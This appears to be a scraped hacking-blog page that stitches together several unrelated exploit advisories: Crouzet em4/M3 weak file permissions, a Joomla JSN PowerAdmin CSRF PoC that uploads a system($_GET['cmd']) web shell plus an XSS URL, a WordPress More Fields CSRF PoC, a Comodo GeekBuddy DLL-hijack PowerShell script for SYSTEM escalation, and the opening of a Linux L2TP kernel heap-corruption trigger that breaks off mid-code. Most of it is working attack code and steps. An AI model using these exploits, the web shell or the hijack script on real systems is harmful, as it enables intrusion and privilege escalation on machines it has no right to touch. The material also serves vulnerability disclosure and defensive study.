Crouzet em4 soft 1.1.04 and M3 soft 3.1.2.0 Insecure File Permissions
Vendor: Crouzet Automatismes SAS
Product web page: http://www.crouzet-automation.com
Affected version: em4 soft (1.1.04 and 1.1.03.01)
M3 soft (3.1.2.0)
Summary: em4 is more than just a nano-PLC. It is a leading
edge device supported by best-in-class tools that enables
you to create and implement the smartest automation applications.
Millenium 3 (M3) is easy to program and to implement, it enables
the control and monitoring of machines and automation installations
with up to 50 I/O. It is positioned right at the heart of the
Crouzet Automation range.
Desc: em4 soft and M3 soft suffers from an elevation of privileges
vulnerability which can be used by a simple authenticated user that can
change the executable file with a binary of choice. The vulnerability
exist due to the improper permissions, with the 'C' flag (Change) for
'Everyone' group.
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Microsoft Windows 7 Ultimate SP1 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5310
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5310.php
25.01.2016
--
C:\Program Files (x86)\Crouzet automation>cacls "em4 soft"
C:\Program Files (x86)\Crouzet automation\em4 soft Everyone:(OI)(CI)C
NT SERVICE\TrustedInstaller:(ID)F
NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
NT AUTHORITY\SYSTEM:(ID)F
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
BUILTIN\Users:(ID)R
BUILTIN\Users:(OI)(CI)(IO)(ID)(special access:)
GENERIC_READ
GENERIC_EXECUTE
CREATOR OWNER:(OI)(CI)(IO)(ID)F
C:\Program Files (x86)\Crouzet automation>cd "em4 soft"
C:\Program Files (x86)\Crouzet automation\em4 soft>cacls *.exe
C:\Program Files (x86)\Crouzet automation\em4 soft\em4 soft.exe Everyone:(ID)C
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
C:\Program Files (x86)\Crouzet automation\em4 soft\unins000.exe Everyone:(ID)C
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
C:\Program Files (x86)\Crouzet automation\em4 soft>
================================================================================================
C:\Program Files (x86)\Crouzet Automatismes>cacls "Millenium 3"
C:\Program Files (x86)\Crouzet Automatismes\Millenium 3 Everyone:(OI)(CI)C
NT SERVICE\TrustedInstaller:(ID)F
NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
NT AUTHORITY\SYSTEM:(ID)F
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
BUILTIN\Users:(ID)R
BUILTIN\Users:(OI)(CI)(IO)(ID)(special access:)
GENERIC_READ
GENERIC_EXECUTE
CREATOR OWNER:(OI)(CI)(IO)(ID)F
C:\Program Files (x86)\Crouzet Automatismes>cd "Millenium 3"
C:\Program Files (x86)\Crouzet Automatismes\Millenium 3>cacls *.exe
C:\Program Files (x86)\Crouzet Automatismes\Millenium 3\M3 soft.exe Everyone:(ID)C
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
C:\Program Files (x86)\Crouzet Automatismes\Millenium 3\unins000.exe Everyone:(ID)C
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
C:\Program Files (x86)\Crouzet Automatismes\Millenium 3>
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863229244
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
---------------------------------------------------------
RatioSec Research Security Advisory RS-2016-001
---------------------------------------------------------
JSN PowerAdmin Joomla! Extension Remote Command Execution Via CSRF and
XSS vulnerabilities
---------------------------------------------------------
Product: JSN PowerAdmin Joomla! Extension
Vendor: JoomlaShine.com
Tested Versions: 2.3.0
Other Vulnerable Versions: Prior versions may also be affected
Vendor Notification: 28th January, 2016
Advisory Publication: 24th February, 2016
CVE Reference: Pending
RatioSec Advisory Reference: RS-2016-001
Risk Level: High
CVSSv3 Base Score: AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
---------------------------------------------------------
RatioSec Research has discovered two cross-site request forgery and
reflected cross-site scripting vulnerabilities in JSN PowerAdmin
Joomla! Extension which can be exploited, respectively, to upload PHP
files and run arbitrary HTML and script code in a user's browser
session in context of the affected web site.
1) The application allows users to perform certain actions via HTTP
requests without performing proper checks to verify the requests
validity. An authenticated user's browser can be forced to upload PHP
files via the extension installer and subsequently execute arbitrary
commands with the web server privileges by tricking the user into
visiting a malicious web site.
2) Input passed to `identified_name` GET parameter when `package` is
set, `option` is set to `com_poweradmin`, `view` is set to
`installer`, and `task` is set to `installer.install` in
`/administrator/index.php` is not properly sanitised before being
reflected. This can be exploited to run arbitrary HTML and script code
in a user's browser session in context of the affected web site.
---------------------------------------------------------
Proof of Concept
Read the advisory details on the RatioSec Research website for the
proof of concept code.
http://www.ratiosec.com/2016/jsn-poweradmin-joomla-extension-rce-via-csrf-and-xss/
----------------------------------------------------------
Solution
No official solution is currently available.
----------------------------------------------------------
Timeline
- First contact: 27th January, 2016
- Disclosure: 28th January, 2016. Preliminary date set to 10th, February 2016.
- E-mail notice after no response: 02nd February, 2016
- Advisory Publication: 24th February, 2016
----------------------------------------------------------
Advisory URL
http://www.ratiosec.com/2016/jsn-poweradmin-joomla-extension-rce-via-csrf-and-xss/
RatioSec Research
Mail: research at ratiosec dot com
Web: http://www.ratiosec.com/
Twitter: https://twitter.com/ratio_sec
----------------
Proof Of Concept
1) The following HTML page exploits the cross-site request forgery vulnerability and uploads a malicious PHP script system($_GET['cmd']); as /tmp/bd.phtml if visited by a logged-in administrator.
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost/no8/joomla/administrator/index.php?option=com_poweradmin&view=installer&task=installer.install", true);
xhr.setRequestHeader("Accept", "*/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------167969427914885435381146171168");
xhr.withCredentials = true;
var body = "-----------------------------167969427914885435381146171168\r\n" +
"Content-Disposition: form-data; name=\"package\"; filename=\"bd.phtml\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\x3cscript language=\"php\"\x3esystem($_GET['cmd']);\r\n" +
"\r\n" +
"-----------------------------167969427914885435381146171168--\r\n" +
"\r\n" +
"\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
The file extension .phtml and the <script language="php"> </script> tags are used here to fool the Joomla API JFile::upload() file validation checks. As result, the backdoor is installed permanently as /tmp/bd.phtml which can be used lately by the attacker to obtain the full system compromise.
Command Execution
2) The following URL exploits the cross-site scripting vulnerability to execute javascript code in a logged-in administrator’s browser.
http://localhost/joomla/administrator/index.php?package=foobar&option=com_poweradmin&view=installer&task=installer.install&identified_name=<img+src%3dx+onerror=alert("RatioSecResearch")>
# Exploit Title: Wordpress More Fields Plugin 2.1 Cross-Site Request Forgery
# Date: 28-02-2016
# Software Link: https://wordpress.org/support/plugin/more-fields
# Exploit Author: Aatif Shahdad
# Twitter: https://twitter.com/61617469665f736
# Contact: aatif_shahdad@icloud.com
# Category: webapps
1. Description
The plugin More Fields has CSRF token validation disabled for all functions, including the add box and delete box options. As a result, a specially crafted attacker page could cause
a logged-in administrator to add and delete any number of extra fields in any number of additional boxes on the Write/Edit page in the Admin.
2. Proof of Concept
Login as admin to the wp-admin area at http://example.com/wp-admin. Open the following Proof-Of-Concept with the browser that you used to log in.
POC to add box named ‘test’:
--POC begins--
Add Boxes:
<html>
<body>
<form action="https://example.com/wpadmin/optionsgeneral.php?page=more-
fields&action=save&keys=_plugin%2C57UPhPh&navigation=boxes" method="POST">
<input type="hidden" name="label" value="test" />
<input type="hidden" name="post_types[]" value="press" />
<input type="hidden" name="position" value="left" />
<input type="hidden" name="fields" value="" />
<input type="hidden" name="ancestor_key" value="" />
<input type="hidden" name="originating_keys" value="_plugin,57UPhPh" />
<input type="hidden" name="action" value="save" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Remove Boxes needs the following simple GET request (Assuming the name of the Box we want to delete is ‘test’):
<html>
<body>
<form action="https://example.com/wpadmin/optionsgeneral.php">
<input type="hidden" name="page" value="more-fields" />
<input type="hidden" name="action" value="delete" />
<input type="hidden" name="action_keys" value="_plugin,test" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Note: I have removed the CSRF tokens from the requests as they are redundant and not validated.
--End of POC--
3. Impact
The attacker can add/delete any number of extra fields in any number of additional boxes on the Write/Edit page in the Admin.
4. Solution:
Add in CSRF token validation to the plugin or switch to a different plugin. The development of the Plugin has ceased so this happens to be the latest version which can’t be upgraded as of now.
<#
````......````
``,;''''''''''''''''';,`
.;''''''''''''''''''''''''''',`
`:''''''''+';:,.``````.,:;'''''''''':`
,;'''''';,.` ``,;'''''';:
`:'''''',. `,'''''';.
`;+''+':` ,; `,''''';.
`;'''';. `` .:;'` `. `;'''''.
` :+''';` `,``:+'' ';;'`,''; `` `` :'''';`
.'''';` ,';' '':'` ';,'`'',' :''' .''` :'''',
`;''''` ;'' :+.` ;';, ';:' ''''`,;:+ '', `;''''`
.''''. ;:`, .'.':`'''.:;`;. +;:' '::; ;''' '; .'''',
:''';` ` '''',`':'' ..;:`','` '''' ':;;`'`';`':` :; :''';
;''+, .;`.'.'' ';.'`';': ,:. ` ` ` `,: .';',,'`;'.`';': .+'''`
`''''` ;'; ''.'.,','` ,` ``;`'' .`;'`''+: ;'''`
`'''' ., .'' ,'.'' ;;. ```````` `. ``'::'`;; ` :'''.
``''': `+,` .':`'',' `,;''''''''''+'':.` ;'.+:;'``': .'''.
`''', '', ''`:; `:'''''''''''''''''''''';. `;'`': ''`'` .''',
`''', ` `''` `'; .''''''''''''''''''''''''''''';` `.;' ;'.''`.: `''',
`''', :''.`'' ` ,;'''''''''''''''''''''''''''''''';. ` `,.'::', ''` .'''.
''', '.''`,': ,'''''''''''''''''''''''''''''''''''''', ` .+,'; ''; .'''`
''': ''`'' ;. `'''''''''''''''''';:::;';'''''''''''''''''. ;' :': ,,` .'''
:''; `''.'` ` :''''''''''''';:::.', `''';`:;'+'''','''''+; `,'; :''' ,'''
.''' `` .++; `''''''''''''`. `': '''; `:''' :'''''''. .+ :''.+. :'':
`''+ :'': `` ,''''''''''''' `': '''; `: ,'''''''': .`''.'' ` '''`
;''. `+.',; ;'''':''''''''; ` ', .'''': ` :''''';'''; `'.',`,', `+''
,'': '';,'. ;''''':''''''''`+` ;..`;'+''. '.:''''';'''''```.+' +:'` .'';
`''' `;``+',;.` ;''''':''''''''.'; `;'', '` '' ;''''','''''` ;,+.+. ;''.
;'+. :'': ;': ;'''''':''''':',''. `'';.+' '` ,'; .'''';''''''` `+.':` `'''
`'': .+`;''` ` ;'''''':''''''.::''. .''. :: `'';`,'''':''''''` :+'. ,'',
'''` :''.:'' :''''''':'''''; :'''' .'', `.,; :+'`''': ;''',''''''' ,` '''
.'': `'';`` ,''''''':;''''':`''';', ,''+` ,+':' +'''''''`,'''''''''''; .+` .'':
''' `''. :', `''''''':`'''''+.;';.:::::::,,''';`'': . .'''''''; ''''.''''''', ` ;'': '''
.'', ','';`. '''''''; :'''''' `,;'''''''''.``` . ''''';:,`:;''+`'''',,'''''''` :'';` `+':
'''` ''.,'; ;''''''; ''''',`,'''''''''''''.....,,,.`''''''''';;,,;.''''; :''''''' '''. ;''
`'': .'';:; `'''''''` .+'', ,''''''''''''; '''''''++`''''':..:'''' `''''' ;'''''', ., `` .'',
` :'' :''` ''''''+` ;''``;'''''''''''''':``,,.`````,'''''. ';.;'''` `'''''''` .++. '';
+'' ,'''''': ;+`,'''''''''''''''''+''';;;;'''''''+` :;+,`''. `.''''''; .+'''` :'+`
,''. ': +'''''; ,,;''''''''''''''''''''''''''''''''''. `.::,` `';.', ;''''''` :'': `. `'';
;'' :;.;': ,''''''. `''''';;;,`.:'''''''''''''''''''''''''.;''''''':`;;;, `''''''; `.; .;'+` ;''
'': ` ;';';' ''''''; ''';;''''''',`.'',` .:;;''''''''''.,'''''''''''.;;. ,'''''' `;''''. .''`
.''. .';`;' .''''''. :+;;''''''''''': ;' ::::...;''+'':,'''';..``;''';. ''''''; `:''.`': `'':
:'' ` ,'` ;''''''. :;'''''''''''''';`;, `,''';` .:;;;'''': ,'''''' .,''', '''
;'; ''';,` `''''''''''` :''''''''''';.:'''`';:` ,''';`;''''''''''', ''''''. ;';,` :''`
`'', .;,'''; ,'''''''''' ;'''''''''':` :'''`::` ``'''',+''''''''''''+` ;'''''; .``.:;` `''.
.''` `+;'`;` '''''''''';.'''''''',` ''';` :''';'''';::;'''''';; ` `''''''` ;'';;; `+':
:'' ..;'' `''''''''''`'''''''', .'''` `+''';''. ,'''''''''''''''''''''''''''''''''''''':`
;'' :. `` .'''''''''';'''''''' ;''; ;''':::` :'''''''''''''''''''''''''''''''''''''''',
;': '''':` :'''''''''''''''''',` .''' ''''. `+'''''''''''''''''''''''''''''''''''''''''
'', :,;'': ;''''''''''''''''''` ;''... :''''` :''''''''''''''''''''''''''''''''''''''''''`
`''. `+'':,` ''''''''''''''''''; ,'';.+` . ,;''' `'''''''''''''''''''''''''''''''''''''''''';
.''. `.,;'; '''''''''';''''''', ''',+. `` .' .''' ''''''''+'''''''''''''''''''''''''''''''''',
.'+` ;''''' `` '''''''` `;''''.'++','`+.''' ''''''; `;+''''''
,'' ''''';; ,'''';'''';'``.''' :''''''` .'''''':
:'+ '''''': .'''';'''';'` .''' ,''''''` ,''''';
:'' ,''''', ''''''` .'''';'''';', .'''` .''''''` ''''''
;'' `''''''; :''''', '''''' .'''';'''';':,''''. .''''''` ''''''
;'' `';''''' :''''', :''''; :''''''''';''.''''' `''''''` ;'''''
;'' :''''', ,''''' `+''''''''':''.'''''` ,'''''; ''''''
:'+ ,''''', `'''''. ,'''''''''':''::''''; ;''''': `''''''
:'' ```. ,''''': ''''': `''''''''''',''+`'''''. `''''''. :''''''
,''` `''''''' .'''''; `''''': '''''''''''';''',,''''', ''''''' ,'''''',
.''` `''':,.; `'''''' `'''''': '''''''''''''';'''`'''''':. `,''''''', .''''''''
`''` `,;;;''` '''''' `'','''';,` `,''''''''''''''',''':.''''''''''''''''''':` ;'''''''''''''''''''''''''''''',
'', `+';;, '''''' `''`,'''''''''''''''''''''''''''':''''.:''''''''''''''''',+ '''''''''''''''''''''''''''''';
'': ` `,. ;'''''. `''' .''''''''''''''''''''''''''''.''''`;''''''''''''''':;; `''''''''''''''''''''''''''';';
;'; ,''''; :''''': `''''``'''''''''''''''''''''''''''`:''''`;''''''''''''';,', ,'''''''''''''''''''''''''''';
;'' ';;,.. .'''''' `''';; :''''''''''''''''';'''''''. '''''`;'''''''''''';+'` ;'''''''''''''''''''''''''';.
:'' `,:;''' ''''''` `'''`';` `;'''''';,''''''';''''''', .'''''..''''''''''''+: '''''''';''''''''';''''';,`
.''. .''',` ;''''': ` ''':;''. ````` :+'''''',;''''''', '''''';..;''''''''''` `'''''' `,'': `+':
'': ` .;. ,'''''+ .'';,'''''''';:''''''''','''''''': ;'''''''''.`,''''''' ;'''''; ,'', .''.
''; :+.++` `''''''. +'''`'''''''''''''''''''.''''''''', .''';;'':,,'''''''', ''''''. ':''', :''`
:'' ,';:.'. ;'''''' ''''.:''''''''''''''''';;'''''''''''.'''. `:;'''''':'': :'''''' ';,.:' '''
.''. .;:''' .''''''` ,'''':`''''''''''''''''':''''''''''';''''.`;'''''''''.'''', '''''': ,'''', `'':
''; ;';, ;` '''''';.+''''' ''''''''''''''''':''''''''''': :'':'''''''''',;''''': :'''';' ,. .;: ,''`
;'' `;', `,'''''''''''''.,'''''''''''''';','''';:.`` `,.;'''''''''''.+''''''.''''''; ,'+'. '''
.''. '''';` ''''';''''''';`'''''''''''''':.'';:,;'''':` ,:`:''''''''','',`:''':''''''` '.:''' `'':
''' :'': `:. ,'''';;'''''''`;'''''''''''',:';`:'',,``.:'. `':`+''''''';:'',':';.''''''; `'''..' :''
:''` `,. ;:++` ''''';,'''''';`''''''''''';;',.''....,.. ,';:.'.`'''''''.'''','';+'''''' ;. ,+''` '';
`'': `'',`;: `'''''',''''''.:''''''''''`+.,';:''''''';.:''':'`,''''''`'''':''''''''', :':;` ,' ,'',
;''` `+.''+` ` :'''''','''''' '''''''''' `.'''''''''''''::'''', +'''':,''''`;'''''''' +.''+; '''
`'': ;'';` ` ''''''':''''';`'''''''', '''''''''''''''.,''''`''''',:''''`,'''''''` '''.:'; .'':
''+` ,` ,+: `'''''','''''':`'''''''` :'''''''''''''; ;'''`+''''`;'''':+''''''.` ` :'':;, '''
.'': ;';''. .'''''';'''''',`'''''+ ''''''''''''''` .,'';.''''' '''''''''''': +'``;'; .'',
''+` :''; ,'` :''''','''''''.,''''' ,'''''''''''''' :''''';''''','''';''''''; ,.''. .`` '''
`';; `+. ;'':' :''''':'''''''.:'''; ;''''''''''''': `'''''''''''.'''''.'''''' :';`''; :''.
:'',` `'':.''` ;'''';;:''''''`'''; '''''''''''''': .'''''''''''.''',;'''''' ` :''.'''` `'''
''' ;'.:''` ;''''';:''''':''';.'';''''''''''': ,'''''''''':;'':+''''''` .''``'+',: '''`
.';; `;;'; ` :''''':'''''';'''`'';''''''''''': ,''''''''''`''';'''''; .,''` :` ,'':
;'', `', `'. ,''''';''''';'''''':''''''''''': .''''''''',`+';,''''; ``.'''; ``'''
'''` `'';: ` .'''':'''''`'''''';;''''''''''; `'''';'''',.`''+,'', ,'`:'''''` '''`
.''' ;'.'' `;''''''''.''''''':'''';:,''';. ,''';''''',;'''',` `;''''''';. ;'',
,''; ''.;', ,';''''';,''''''`+,` .;:;''',,'';'''+.;''''',```:+,''''''''''.:'';
;''; ''';', '. `,''''''.'''''' `.:;'+''''+''';.,.''':,''''''` ``'''''''''''''',''
''': .,,': :': +''''''',''';.:'+,.` `.:''':`''''''''''; `'':'''''''''''''',`
''': ` .'' `'`;'''''''..,.:+,` ``.,.` ,'''`;'''''''+.';'.:'''':;'''''+:.'`
''': ;:`+'` ,:..,''''''; .+: `:'+''''';` ;'; .''''': `:';:+''';`''''''. .':
`'''; ; ;'. .';'`;'''',;'. .+''''''''''` ;;'+:'''; .+'''''''';''''''.;,'';
`'''' ,'; :'`'`;'''':+` `'''''''''''': ;'';'''`;''''''''''''''''',.''';
`'''' ` ` `':. ';''.+. `''''''''''''; `'''''::'''.'''',`'''''': :';;''
''''. :;,'`:'.';', '''''''''''': ,'''','''..''': '''';;:,''. `''
:''': `.+'' '''',' :''''''''''+. ''''''':`'''' .''';:;`.'.:' ';
,''''` `,` ',;:'. `;;;,``'''::::;''; :';, ,'''''' ;'''` +'''.''+'.:'+`':
`'''': ` ;'':' '''''+;.; `` ,:`''''', `'''''`,'''' :'''.''''..''','.
:''''. .,': :'''''''.`;'''';` .''''''` '''':`+'''``''',;'''``''';:'.
`'''''` `.'` ''''''';`'''''''': ,'''''; ;'''`''''; ''';:'''. ;''',''
,'''''` `.'` '''''''.'''''''''', +'''''` ,'';.''''`''''`+''' ,''''`.:
:''''', .' '''''''.'''';:.,'''`''''''. .''''''':.''',;'''``;,',' '.
`:+'''';..; '''''':,''':'''.:''.'''''': `'`''''' ''''`''': ' ::.:`+
`,''''':' ''''''::''+`''',;''.;''''', `'.'''';`'''.;'''`:.,+`'`,:
.;+':' '''''';.''''';`,'''.''''''` `'.''''.,'''`'''.`;`+;`' +
.:+` '''''''`''''''+'''+.'''''; .' ;''' ;''.;,'' ' ''.:``:
'. :'''''':.+'''''''',;''''', ;: ;''; '''.'.,;,,:'' '`'
;; `'''''''``;'''''',`,''''' `'` ''',.''',.:;`' ''.,.`;
.+ ''''''' ` `.,,.`'; '''; :; `''+`;'';;: :.;`',`; ;`
+: `'''''``';;;;;'''', `` `+. `''' '''::;;:;`;'`;..,
,' ``.. `+''''''''''+` :' `'';`''':. ,.',''.; '
`+' :'''''''''''', `+.` '',.''',. :,''''+ ;
.', ;''''''''''''. ': ''.,''':` ;.''''.,.
:'. :''''''''''', ;'` ''.:''',':;.''':.:
''. ,:''''',` ;+` :'.:'''' ':`''; ;
`'', ''. ::,''''``; :, '
;+;` .'+` ``'':'`,; '``
,'';. `.'';` :';'.,; '.
`,''';:::::;'''. ``+;' +`
`,:''''';,` ,,;
SHFolder.DLL Local Privilege Elevation Exploit for Comodo Anti-Virus GeekBuddy Component by @Laughing_Mantis (Greg Linares)
Since it took 146 days to fix a DLL Hijack issue I decided to drop this PoC:
###Technical Geeky Stuff###
GeekBuddy stores several helper applications within the C:\ProgramData\Comodo\lps4\temp folder.
These binaries are individual components of the Comodo Security Suite and are executed whenever
their related function is performed, updated, or uninstalled.
The directory listing is as follows:
10/06/2015 12:08 AM <DIR> .
10/06/2015 12:08 AM <DIR> ..
10/02/2015 10:43 PM 27 download.cfg
10/02/2015 10:47 PM 637,864 setup_clps_application_vulnerability_monitor_release-4.10.307677.9.exe
10/02/2015 10:44 PM 2,196,272 setup_clps_autoruns_manager_api_release-4.14.330616.6.exe
10/02/2015 10:44 PM 547,088 setup_clps_boot_time_monitor_release-4.12.315371.9.exe
10/06/2015 12:07 AM 1,014,024 setup_clps_browser_addons_api_release-4.0.292287.4.exe
10/02/2015 10:44 PM 554,240 setup_clps_browser_addons_monitor_release-4.12.315370.6.exe
10/06/2015 12:06 AM 950,864 setup_clps_client_transaction_release-4.19.365037.89.exe
10/06/2015 12:08 AM 563,896 setup_clps_cross_selling_installer_monitor_release-4.12.318569.13.exe
10/02/2015 10:43 PM 768,032 setup_clps_cspm_alert_monitor_release-4.19.360508.5.exe
10/06/2015 12:08 AM 581,432 setup_clps_immaturely_closed_sessions_monitor_release-4.21.366534.6.exe
10/02/2015 10:47 PM 459,432 setup_clps_memory_monitor_release-4.10.301764.3.exe
10/02/2015 10:46 PM 1,152,480 setup_clps_system_cleaner_api_release-4.2.292287.3.exe
10/06/2015 12:07 AM 1,989,272 setup_clps_system_cleaner_monitor_release-4.12.317464.8.exe
10/06/2015 12:07 AM 648,912 setup_clps_windows_event_monitor_release-4.19.362032.8.exe
10/02/2015 10:43 PM 1 survey_version.txt
10/06/2015 12:05 AM <DIR> updates
The C:\ProgramData\Comodo\lps4\temp\ folder has the following permission configuration:
C:\ProgramData\Comodo\lps4\temp NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
BUILTIN\Administrators:(OI)(CI)(ID)F
CREATOR OWNER:(OI)(CI)(IO)(ID)F
BUILTIN\Users:(OI)(CI)(ID)R
BUILTIN\Users:(CI)(ID)(special access:)
FILE_WRITE_DATA
FILE_APPEND_DATA
FILE_WRITE_EA
FILE_WRITE_ATTRIBUTES
Notice how the folder allows Users to have FILE_WRITE_DATA and FILE_WRITE_EA access. This allows
non-administrator users the ability to create files in the directory but not delete or modify
existing files.
Comodo's main service engine is controlled by the SYSTEM service Launcher-Service.exe which resides
in the C:\Program Files (x86)\Common Files\COMODO\ folder. This service is auto launched by the
registry key HKLM\System\CurrentControlSet\Services\CLPSLauncher
This binary will then launch Unit_Manager.exe in the C:\Program Files\COMODO\GeekBuddy with SYSTEM
level privielges. This binary in turn then launches the binary C:\Program Files\COMODO\GeekBuddy\unit.exe
to handle each sub process in the C:\ProgramData\Comodo\lps4\temp\ folder.
During client connections to update servers and Geek Buddy executions the unit.exe binary will
launch the binary setup_clps_client_transaction_release-4.19.365037.89.exe. This setup binary has
hardcoded DLL loading procedures to look for SHFOLDER.DLL in the current directory which it is
executed from.
.data:00409240 dd offset aShfolder ; "SHFOLDER"
.data:00409244 dd offset aShgetfolderpat ; "SHGetFolderPathA"
During this delay load procedure the exe will load SHFOLDER.DLL from its local directory before
looking in the other PATHS variables.
By planting a malicious SHFOLDER.DLL in the C:\ProgramData\Comodo\lps4\temp\ and triggering an
update or client connection to secure servers (which occurs automatically at user login) a user can
elevate their privileges to SYSTEM and compromise the system fully.
######### GREETZ ######################################################################################
1st off all my new homies in the Vectra Networks Research Team - you guys are seriously legit mad #respect to everyone here. #Humbled
@taviso - keep killing it and thanks for being an inspiration
@bill_billbil - sup girl chicken rico n chill
@tacticalRCE - Its no 100 mile rides but will miss all the good times. C-ya around mang.
@hellNBak_ - drop tehm greetz like its 2003
@hacksforpancakes - make plans for other NullCon in 2016 ;)
@jduck - we gonna juke some more toyotas next time you come visit
@hdmoore - good luck with your ventures good sir
@jsoo - dont give up good sir - you're doing awesome
@thegrugq - when i grow up i hope im half as wise as you good sir
@daveaitel - Triangular Anus logos are the best
@da_667 - AYYYYYYYYYYYYYY LMAO
@bonovoxly - Clever Girls Wear Pink on Wednesdays
Derek Soeder - Respect to you brother, keep on being awesome
Benny 29A - next time im in CZ lets get beers, im buying
Yuji Ukai - #RESPECT to everything you have ever done and will ever do. #Ninja
Sizzop - for fixing my greetz
#########################################################################################################
#>
Param
(
[Parameter(ValueFromPipelineByPropertyName = $true)]
[string]$DLL = ""
)
if (!(Test-Path $DLL))
{
throw "Fatal Error: The specified file: $DLL does not exist."
}
Copy-Item -Path $DLL -Destination "C:\ProgramData\Comodo\lps4\temp\SHFolder.dll" -Force
Write-Host "Copying $DLL to the Comodo AV GeekBuddy's insecure temp folder as SHFolder.dll" -ForegroundColor Red
[void][System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
$objNotifyIcon = New-Object System.Windows.Forms.NotifyIcon
$MyPath = Get-Process -id $pid | Select-Object -ExpandProperty Path
$objNotifyIcon.Icon = [System.Drawing.Icon]::ExtractAssociatedIcon($MyPath)
$objNotifyIcon.BalloonTipIcon = "Info"
$objNotifyIcon.BalloonTipText = "Hijacked SHFolder.DLL with $DLL.
Now manually update Comodo Anti-Virus using the GUI or Reboot the system to gain SYSTEM Level Privileges"
$objNotifyIcon.BalloonTipTitle = "@Laughing_Mantis"
$objNotifyIcon.Visible = $True
$objNotifyIcon.ShowBalloonTip(8000)
/*
Source: https://code.google.com/p/google-security-research/issues/detail?id=735
In certain kernel versions it is possible to use the AIO subsystem (io_submit syscall) to pass size values larger than MAX_RW_COUNT to the networking subsystem's sendmsg implementation. In the L2TP PPP sendmsg implementation, a large size parameter can lead to an integer overflow and kernel heap corruption during socket buffer allocation. This could be exploited to allow local privilege escalation from an unprivileged user account.
This issue affects 64-bit systems running older branches of the Linux kernel, such as version 3.10 and 3.18. More recent major versions aren't affected due to refactoring in the AIO subsystem. The attached proof-of-concept trigger has been tested on a fully updated Ubuntu 14.04 LTS server. This issue is also likely to affect 64-bit Android devices, which typically use branches of 3.10.
The first observation is that an IOCB_CMD_PWRITE of a large length (such as 0xffffffff) will correctly bound the request iocb's ki_nbytes value to MAX_RW_COUNT. However, in the single vector case, if the relevant access_ok check passes in aio_setup_single_vector then the iov length will still be large (0xffffffff). On 64-bit systems it is possible for access_ok(type, user_ptr, 0xffffffff) to succeed.
The second observation is that sock_aio_write does not use the iocb for the sendmsg size calculation, but instead takes the summation of all input iov lengths. Thus calling io_submit with an IOCB_CMD_PWRITE operation on a socket will result in a potentially large value being passed to sendmsg.
The third observation is that AF_PPPOX sockets using the PX_PROTO_OL2TP protocol has a sendmsg implementation that does not bounds check the incoming length parameter (called total_len) before using the value to calculate the length of a socket buffer allocation (using sock_wmalloc).
The fourth observation is that the underlying socket buffer allocation routine __alloc_skb uses an "unsigned int" for it's size parameter rather than a size_t, and that this value can wrap to a small positive value upon alignment calculations and internal space overhead calculations. This results in a small value being passed to kmalloc for the socket buffer data allocation. Then, the size is recalculated using SKB_WITH_OVERHEAD, which effectively re-underflows the size calculation to a small negative value (large unsigned value). The newly created socket buffer has a small backing data buffer and a large size.
The proof-of-concept trigger crashes when writing the skb_shared_info structure into the end of the socket buffer, which is out-of-bounds. Other corruption may also be possible in pppol2tp_sendmsg/l2tp_xmit_skb/ip_output.
*/
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <linux/if.h>
#include <linux/if_pppox.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <linux/aio_abi.h>
int main(int argc, char *argv[]) {
struct sockaddr_pppol2tp sax;
struct sockaddr_in addr;
int s, sfd, ret;
struct iocb *iocbp;
struct iocb iocb;
aio_context_t ctx_id = 0;
void *data;
s = socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP);
if (s == -1) {
perror("socket");
return -1;
}
memset(&sax, 0, sizeof(struct sockaddr_pppol2tp));
sax.sa_family = AF_PPPOX;
sax.sa_protocol = PX_PROTO_OL2TP;
sax.pppol2tp.fd = -1;
sax.pppol2tp.addr.sin_addr.s_addr = addr.sin_addr.s_addr;
sax.pppol2tp.addr.sin_port = addr.sin_port;
sax.pppol2tp.addr.sin_family = AF_INET;
sax.pppol2tp.s_tunnel = -1;
sax.pppol2tp.s_session = 0;
sax.pppol2tp.d_tunnel = -1;
sax.pppol2tp.d_session = 0;
sfd = connect(s, (struct sockaddr *)&sax, sizeof(sax));
if (sfd == -1) {
perror("connect");
return -1;
}
